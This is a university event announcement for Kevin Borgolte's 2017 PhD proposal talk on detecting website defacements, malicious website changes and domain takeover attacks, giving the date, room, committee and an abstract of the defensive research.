PhD Proposal -- Kevin Borgolte

Date: 
Tuesday, August 29, 2017 - 1:00pm
Location: 
HFH 4164
Title: 
Fighting Large-scale Abuse and Web-based Threats
Committee: 
Christopher Kruegel (Co-Chair), Giovanni Vigna (Co-Chair), Ben Zhao

The widespread access to the Internet and the ubiquity of web-based services

makes it easy to communicate and interact globally. Unfortunately, the

software implementing the functionality of web sites is often vulnerable to

attacks, such as code injection, or administrative access might not be

restricted correctly. In turn, an attacker can exploit these vulnerabilities

to compromise and abuse a website for nefarious purposes. In my research, I

aim to better understand, detect, and prevent these attacks.

 

First, we look at a visible way in which websites are being compromised:

website defacements, which can inflict significant harm on its owner through

the loss of sales, the loss in reputation, or because of legal ramifications.

I introduce Meerkat, a defacement detection system that requires no prior

knowledge about the website's content or its structure, but only its URL.

Meerkat uses computer vision techniques to recognize if a website was defaced,

similarly to how a human analyst decides if a website was defaced when viewing

it in a web browser.

 

Second, an attacker is not limited to abuse compromised websites in a way that

is visible to users. Instead, she can infect them with malware. Although this

is a known problem, identifying malicious web sites has become a major

challenge in today's Internet. I introduce Delta, a novel, purely static

analysis approach that extracts change-related features between two versions

of the same website, uses a machine-learning algorithm to derive a model of

web site changes, detects if an introduced change was malicious or benign,

identifies the underlying infection vector campaign based on clustering, and

generates an identifying signature.

 

Finally, we glance at my ongoing work on the practicality and impact of domain

takeover attacks, which an attacker can similarly abuse to spread

misinformation or malware, and we perform a preliminary analysis of how these

attacks can be foiled.

Everyone welcome!